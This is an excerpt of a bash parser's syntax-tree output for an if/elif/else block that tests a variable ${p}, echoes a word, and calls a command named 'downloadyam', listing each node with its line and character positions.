    ReservedwordNode(lineno=39, pos=(2188, 2192), word='then'),
    CommandNode(lineno=40, pos=(2194, 2210), parts=[
      WordNode(lineno=40, pos=(2194, 2198), word='echo'),
      WordNode(lineno=40, pos=(2199, 2210), word='officeing'),
    ]),
    ReservedwordNode(lineno=41, pos=(2211, 2215), word='elif'),
    ListNode(lineno=41, pos=(2216, 2231), parts=[
        CommandNode(lineno=41, pos=(2216, 2230), parts=[
          WordNode(lineno=41, pos=(2216, 2217), word='['),
          WordNode(lineno=41, pos=(2218, 2222), word='${p}', parts=[
            ParameterNode(lineno=41, pos=(2218, 2222), value='p'),
          ]),
          WordNode(lineno=41, pos=(2223, 2226), word='-eq'),
          WordNode(lineno=41, pos=(2227, 2228), word='0'),
          WordNode(lineno=41, pos=(2229, 2230), word=']'),
        ]),
        OperatorNode(lineno=41, op=';', pos=(2230, 2231)),
      ]),
    ReservedwordNode(lineno=41, pos=(2231, 2235), word='then'),
    CommandNode(lineno=42, pos=(2237, 2248), parts=[
      WordNode(lineno=42, pos=(2237, 2248), word='downloadyam'),
    ]),
    ReservedwordNode(lineno=43, pos=(2249, 2253), word='else'),
    CommandNode(lineno=44, pos=(2255, 2262), parts=[
      WordNode(lineno=44, pos=(2255, 2259), word='echo'),
      WordNode(lineno=44, pos=(2260, 2262)),
    ]),
    ReservedwordNode(lineno=45, pos=(2263, 2265), word='fi'),
  ]),
], pos=(2170, 2265))
